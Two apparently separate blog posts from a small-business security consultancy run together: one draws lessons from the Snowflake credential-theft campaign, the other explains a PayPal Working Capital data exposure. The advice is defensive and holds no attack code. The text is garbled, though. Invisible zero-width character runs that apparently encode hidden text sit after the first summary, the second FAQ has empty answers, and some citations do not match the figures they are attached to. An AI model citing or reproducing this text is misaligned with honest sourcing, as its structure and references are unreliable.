TL;DR

The 2024–2025 Snowflake customer exposure campaign compromised over 165 organisations — including Ticketmaster (560 million records) and AT&T (109 million accounts) — using nothing more sophisticated than stolen credentials on accounts without multi-factor authentication. Australian SMBs face the same blast radius today: credential-based intrusions drive 80% of cloud breaches, yet only 5% of SMBs have tested their recovery plans. Three controls implemented this week — Conditional Access, Privileged Identity Management, and centralised log retention — can close the same entry points attackers used against billion-dollar enterprises.​‌‌​​​‌‌‍​‌‌​‌‌​​‍​‌‌​‌‌‌‌‍​‌‌‌​‌​‌‍​‌‌​​‌​​‍​​‌​‌‌​‌‍​‌‌​​​‌​‍​‌‌‌​​‌​‍​‌‌​​‌​‌‍​‌‌​​​​‌‍​‌‌​​​‌‌‍​‌‌​‌​​​‍​​‌​‌‌​‌‍​‌‌​​​​‌‍​‌‌‌​‌​‌‍​‌‌‌​‌​​‍​‌‌​‌‌‌‌‍​‌‌‌​​​​‍​‌‌‌​​‌‌‍​‌‌‌‌​​‌‍​​‌​‌‌​‌‍​‌‌‌​​‌‌‍​‌‌​‌‌‌​‍​‌‌​‌‌‌‌‍​‌‌‌​‌‌‌‍​‌‌​​‌‌​‍​‌‌​‌‌​​‍​‌‌​​​​‌‍​‌‌​‌​‌‌‍​‌‌​​‌​‌‍​​‌​‌‌​‌‍​‌‌​‌‌​​‍​‌‌​​‌​‌‍​‌‌‌​​‌‌‍​‌‌‌​​‌‌‍​‌‌​‌‌‌‌‍​‌‌​‌‌‌​‍​‌‌‌​​‌‌‍​​‌​‌‌​‌‍​‌‌‌​​‌‌‍​‌‌​‌‌​‌‍​‌‌​​​‌​‍​​‌​‌‌​‌‍​​‌‌​​‌​‍​​‌‌​​​​‍​​‌‌​​‌​‍​​‌‌​‌‌​

The Breach: What Happened

Between April 2024 and mid-2025, a financially motivated threat actor tracked as UNC5537 systematically compromised Snowflake customer tenants, exfiltrating hundreds of millions of records from organisations including Ticketmaster, Santander Bank, AT&T, Advance Auto Parts, and at least 165 others [1].

This was not a sophisticated zero-day exploit. It was not a Snowflake platform vulnerability. The attackers purchased credentials from infostealer malware logs — some dating back to 2020 — and simply logged in.​‌‌​​​‌‌‍​‌‌​‌‌​​‍​‌‌​‌‌‌‌‍​‌‌‌​‌​‌‍​‌‌​​‌​​‍​​‌​‌‌​‌‍​‌‌​​​‌​‍​‌‌‌​​‌​‍​‌‌​​‌​‌‍​‌‌​​​​‌‍​‌‌​​​‌‌‍​‌‌​‌​​​‍​​‌​‌‌​‌‍​‌‌​​​​‌‍​‌‌‌​‌​‌‍​‌‌‌​‌​​‍​‌‌​‌‌‌‌‍​‌‌‌​​​​‍​‌‌‌​​‌‌‍​‌‌‌‌​​‌‍​​‌​‌‌​‌‍​‌‌‌​​‌‌‍​‌‌​‌‌‌​‍​‌‌​‌‌‌‌‍​‌‌‌​‌‌‌‍​‌‌​​‌‌​‍​‌‌​‌‌​​‍​‌‌

​​​​‌‍​‌‌​‌​‌‌‍​‌‌​​‌​‌‍​​‌​‌‌​‌‍​‌‌​‌‌​​‍​‌‌​​‌​‌‍​‌‌‌​​‌‌‍​‌‌‌​​‌‌‍​‌‌​‌‌‌‌‍​‌‌​‌‌‌​‍​‌‌‌​​‌‌‍​​‌​‌‌​‌‍​‌‌‌​​‌‌‍​‌‌​‌‌​‌‍​‌‌​​​‌​‍​​‌​‌‌​‌‍​​‌‌​​‌​‍​​‌‌​​​​‍​​‌‌​​‌​‍​​‌‌​‌‌​

How They Got In

The kill chain was devastatingly simple:

  1. Initial access: Credentials harvested by infostealer malware (RedLine, Vidar, Raccoon) from contractor and employee machines were sold on dark-web marketplaces. Some credentials were years old but still valid.
  2. No MFA: Affected Snowflake instances had no multi-factor authentication configured. Single-factor username-and-password was sufficient for full access. In several cases, the accounts were service accounts never intended for interactive login — but nothing prevented it [2].
  3. Lateral movement: Once inside, attackers used Snowflake's native RESULT_SCAN and COPY INTO commands — legitimate database operations — to locate and stage terabytes of data for exfiltration.
  4. No detection: The average dwell time exceeded 60 days. Logs existed but were not being monitored.

What It Cost

Mandiant's investigation estimated over 500 compromised credentials across the victim pool. Ticketmaster alone lost 560 million customer records including partial payment card data [1]. The financial toll from regulatory fines, notification costs, class-action litigation, and share-price impact ran into the billions across the victim set.

The pattern mirrors what Sophos reports in 2026: ransomware groups grew 35% year-on-year, with 5,400 documented attacks in 2025. Check Point's VP of Exposure Management notes that the exploitation window for a known vulnerability has shortened from 30 days to hours [3]. For an SMB, the insolvency maths are stark: median Australian SMB cash reserves of $12,100 against average cyber insurance claims of $264,000 — a 22-to-1 gap [2].

Three Preventions Your SMB Can Implement This Week

Every entry point in the Snowflake campaign maps to a control Australian SMBs can activate in their Microsoft 365, Google Workspace, or AWS tenant today.

1. Conditional Access Policies

The attackers walked through an unlocked door. Conditional Access enforces context-aware authentication gates: if the sign-in originates from an unusual location, an unmanaged device, or a risky IP, access is blocked or challenged regardless of correct credentials.

  • Implementation: In Azure AD/Entra ID, create a policy requiring MFA for all users accessing administrative portals, cloud apps, or sensitive data workloads. Block legacy authentication protocols (POP3, IMAP, SMTP auth) entirely — they cannot enforce MFA.
  • Time required: Under 2 hours. Microsoft provides a "Report-only" mode to simulate impact before enforcement.
  • What it stops: Credential stuffing, stolen password reuse, and the exact attack pattern used against Snowflake customers.

2. Privileged Identity Management (PIM)

Service accounts and over-privileged users were the linchpin of UNC5537's success. PIM eliminates standing administrative privileges — access is granted just-in-time, for a limited duration, with approval workflows and full auditing.

  • Implementation: In Entra ID, onboard Global Administrators, SharePoint Administrators, and Exchange Administrators into PIM. Set maximum activation time to 4 hours. Require MFA at activation time and, for critical roles, require approval from a second administrator [4].
  • Time required: One business day.
  • What it stops: Lateral movement by an attacker who compromises a single over-privileged account. Even if credentials are stolen, the attacker cannot self-elevate to admin without an approval chain.

3. Centralised Log Retention with Monitoring

The average dwell time in the Snowflake campaign was months — not because logs didn't exist, but because nobody was looking. The ACSC Essential Eight recommends centralised, protected log collection with a minimum 7-day retention for event logs and 12 months for critical system logs [5].

  • Implementation: For Microsoft 365 tenants, enable Unified Audit Log and ship logs to a Log Analytics workspace or a Sentinel instance. For AWS, enable CloudTrail across all regions with a 90-day minimum retention in S3. For Google Workspace, enable Workspace Audit Logs and retain for a minimum of 6 months.
  • Time required: Under 3 hours to configure. Ongoing monitoring can start with Microsoft Sentinel's free-tier or a lightweight open-source SIEM like Wazuh.
  • What it stops: Undetected exfiltration. Even a basic alert rule — "suspicious COPY INTO to external stage" or "bulk data transfer exceeding 5 GB in 1 hour" — would have caught UNC5537 in the first 72 hours.

FAQ

Q: My business uses Google Workspace, not Microsoft 365. Do these controls still apply?

A: Yes. Google Workspace offers Context-Aware Access (equivalent to Conditional Access), Privileged Administrator accounts with just-in-time elevation, and Workspace Audit Logs with configurable retention. The principles are identical — only the product names change.

Q: We're a 12-person shop. Is PIM overkill?

A: It is the opposite. Small organisations have the most to gain from PIM because a single compromised admin account — often the business owner's — grants total control. PIM protects that single point of failure without adding ongoing maintenance overhead.

Q: What's the single highest-impact thing we can do this afternoon?

A: Enable MFA on every account with administrative or financial privileges. Then disable legacy authentication protocols. Together, these two steps would have prevented the entire Snowflake campaign. Time required: 90 minutes.

Q: Do we need a full SIEM to make log retention useful?

A: No. Start by connecting your tenant to the vendor's native security dashboard — Microsoft Secure Score, Google Security Health, or AWS Security Hub. These free tools surface the highest-risk misconfigurations without needing a dedicated SOC.

Conclusion

The Snowflake campaign was not a sophisticated nation-state operation. It was a financially motivated group exploiting one of the oldest and most preventable misconfigurations in cybersecurity: accounts without multi-factor authentication. The same conditions exist in Australian SMB tenants today.

Check Point reports that one million machines are infected with infostealer malware daily, and those harvested credentials are sold within hours [3]. The Sophos Threat Research Unit confirms that the consolidation of "supergroups" like LockBit has been replaced by a fluid ecosystem of smaller, faster-moving gangs — over 94 tracked groups across 124 countries [3]. Your credentials are likely already circulating.

This is not a problem that requires a SOC or a six-figure security budget. Conditional Access, Privileged Identity Management, and centralised log retention are included in the licences many SMBs already own.

Protect your cloud tenant this week. Visit consult.lil.business for a free cybersecurity posture assessment — we will review your Conditional Access policies, identity hygiene, and log retention in one session.

References

  1. Mandiant: UNC5537 Snowflake Campaign Analysis
  2. NIST SP 800-207: Zero Trust Architecture
  3. Sophos: Ransomware in 2026 — Newer Groups, Severe Impact (SMBtech)
  4. Microsoft: Privileged Identity Management Documentation
  5. ACSC: Essential Eight Maturity Model

TL;DR (The Short Version)

  • PayPal accidentally left a window open in their business loan app for 5 months — anyone who knew the right way to look could see your private data.
  • Your name, phone, business address, Social Security number, and birthday may have been exposed.
  • Some people had money taken from their accounts. PayPal gave refunds.
  • You can get 2 years of free credit protection from PayPal — but you need to sign up before June 30, 2026.
  • Four things you should do right now (they take 30 minutes, they're all free, and they make a real difference).

Let's Start With a Simple Analogy

Imagine your business keeps a filing cabinet with all its important documents — contracts, bank statements, your Social Security card. Now imagine a staff member accidentally propped the filing cabinet door open for 5 months without realising. Anyone who walked by could look inside.

That's basically what happened with PayPal's Working Capital loan app. It wasn't a dramatic movie-style hack. There was no sinister hacker who cracked a secret code. A programmer made a mistake in the software, and that mistake left a door open. PayPal found the open door on December 12, 2025, and closed it the next day. But it had been open since July 1, 2025 — that's 165 days.

What Is PayPal Working Capital?

PayPal Working Capital is a loan product that PayPal offers specifically to small businesses. If you sell things through PayPal and need cash quickly, you can borrow money and repay it through a portion of your future sales. It's popular with small business owners, online sellers, and sole traders.

The people affected by this breach are small business owners who applied for or used this loan product. Regular PayPal consumer accounts were not part of this specific breach.

What Information Was in That "Filing Cabinet"?

The exposed information included:

  • Your full name and business address — straightforward to find anyway, but now confirmed accurate
  • Your email address and phone number — this is how scammers will reach you next
  • Your Social Security number (SSN) — this is the sensitive one. With an SSN plus your name and birthday, someone can pretend to be you and open credit accounts or file tax returns
  • Your date of birth — the final piece of the identity puzzle

Think of your SSN + name + birthday as a master key to your financial identity. Individually, each piece is just information. Together, they're a key that opens doors you really don't want opened.

Did Anyone Actually Use This Information?

Yes — for a small group of customers. PayPal confirmed that some customers had unauthorised transactions on their accounts as a direct result of this breach. PayPal issued refunds to those people. PayPal also reset passwords for all affected accounts.

The Good News: PayPal Is Offering Free Protection

PayPal is offering 2 years of free credit monitoring through Equifax — one of the three major credit agencies in the US. This service:

  • Watches all three credit bureaus (Equifax, Experian, TransUnion) for suspicious activity
  • Scans the dark web for your Social Security number
  • Sends alerts if anyone tries to open an account in your name
  • Includes up to $1,000,000 in identity theft insurance

You need to enrol using the activation code from your breach notification letter before June 30, 2026. Check your email and mail for a letter from PayPal dated around February 10, 2026.

4 Things to Do Right Now (All Free, Takes 30 Minutes)

1. Sign up for the free credit monitoring. Use the Equifax activation code from PayPal's letter. This is free and adds a significant layer of protection.

2. Freeze your credit. This is the big one. A credit freeze tells the credit bureaus: "Don't let anyone open a new account in my name." It doesn't affect your existing accounts or credit score. You can freeze and unfreeze online whenever you need to. It's free by law. Do this at all three: Equifax.com, Experian.com, and TransUnion.com.

3. Check your PayPal account and your business credit profile. Look at your PayPal transaction history for any payments you didn't make. Also check your business credit via Dun & Bradstreet (dnb.com) — fraudsters sometimes target business credit, not just personal.

4. Be on alert for very convincing scam calls and emails. Scammers will now have your name, SSN, business address, and email. They will use this to sound like they already know you — because they do. Anyone calling and claiming to be PayPal, your bank, or the IRS who asks for a password or code is a scammer. Hang up. Call back on the official number from the website.

How to Keep Your Business Safe Going Forward

This breach happened because of a software mistake at PayPal — not because you did anything wrong. But it's a useful reminder that your business data lives in many places: your payment platform, your accounting software, your bank, your phone. Knowing what data is where — and what to do if one of those systems leaks — is exactly the kind of resilience that protects your business without requiring a big IT budget.

That's what lilMONSTER specialises in. We help small businesses understand their actual exposure, not just tick compliance boxes. A 30-minute conversation often reveals the gaps — and the fixes are usually simpler than you think.

Want to know what data your business is exposing through the platforms you use every day? Book a free consult with lilMONSTER →

FAQ

Q: What is the main security concern covered in this post? A:

Q: Who is affected by this? A:

Q: What should I do right now? A:

Q: Is there a workaround if I can't patch immediately? A:

Q: Where can I learn more? A:

References

[1] Office of the Australian Information Commissioner (OAIC). "Guide to Securing Personal Information." OAIC, 2023. https://www.oaic.gov.au/privacy/privacy-guidance-for-organisations-and-government-agencies/guidance-and-advice/guide-to-securing-personal-information

[2] IBM Security. "Cost of a Data Breach Report 2024." IBM Corporation, 2024. https://www.ibm.com/reports/data-breach

[3] Cybersecurity and Infrastructure Security Agency (CISA). "Identity Theft and Internet Scams." CISA, 2024. https://www.cisa.gov/topics/cybersecurity-best-practices/identity-theft-and-internet-scams

[4] Verizon. "2024 Data Breach Investigations Report." Verizon Business, 2024. https://www.verizon.com/business/resources/reports/dbir/

Ready to strengthen your security?

Talk to lilMONSTER. We assess your risks, build the tools, and stay with you after the engagement ends. No clipboard-and-leave consulting.

Get a Free Consultation